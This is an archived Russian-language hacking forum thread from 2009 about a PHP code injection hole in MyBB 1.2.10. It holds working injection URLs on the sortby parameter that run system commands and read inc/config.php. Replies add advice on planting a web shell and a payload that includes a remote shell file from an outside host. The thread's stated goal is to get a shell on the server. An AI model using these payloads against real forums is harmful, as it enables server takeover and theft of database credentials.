Форум АНТИЧАТ - Php Inj в Mybb 1.2.10

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - Php Inj в Mybb 1.2.10 (https://forum.antichat.xyz/showthread.php?t=149667)

TreV@N

20.10.2009 07:36

Php Inj в Mybb 1.2.10

Здравствуйте.Есть уязвимость в mybb 1.210 такого вида

Код:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];phpinfo();exit;//  

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];system('ls');exit;// 

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];readfile('inc/config.php');exit;//

Но когда я пытаюсь зайти в папку С:\\Program files\(Папки с пробелом) он почему то не заходит(пишет разные символы).В чем проблема?Как можно заменить пробел?Доступ к диску C:\ есть(Сайт стоит на denwer'e).

И ишо вопрос как можно залить шелл?

Aртем

20.10.2009 07:41

В чем проблема залить шелл?
Узнай полный путь до каталога который видно с веба (на который у тебя хватит прав) и залей. Попробуй так: C:\PROGRA~1\[директория сервера]

Либо залей в корень диска С: пхп файл и проинклюдь его самостоятельно

TreV@N

20.10.2009 08:44

Путь я знаю.Какими командами залить шелл?

Nelzone

20.10.2009 10:40

TreV@N тебе в другой раздел

TreV@N

20.10.2009 10:54

Какой?И чем тебя этот не устраевает?

Nelzone

20.10.2009 10:55

Цитата:

Сообщение от TreV@N

Какой?И чем тебя этот не устраевает?

http://forum.antichat.ru/forum16.html :o

1NtR0

20.10.2009 15:42

Цитата:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];include('http://site.com/shell.txt');exit;//

узнать диру:

Цитата:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];echo getcwd();exit;//

TreV@N

20.10.2009 16:33

Спасибо.По первому вопросу подскажите.

Время: 20:02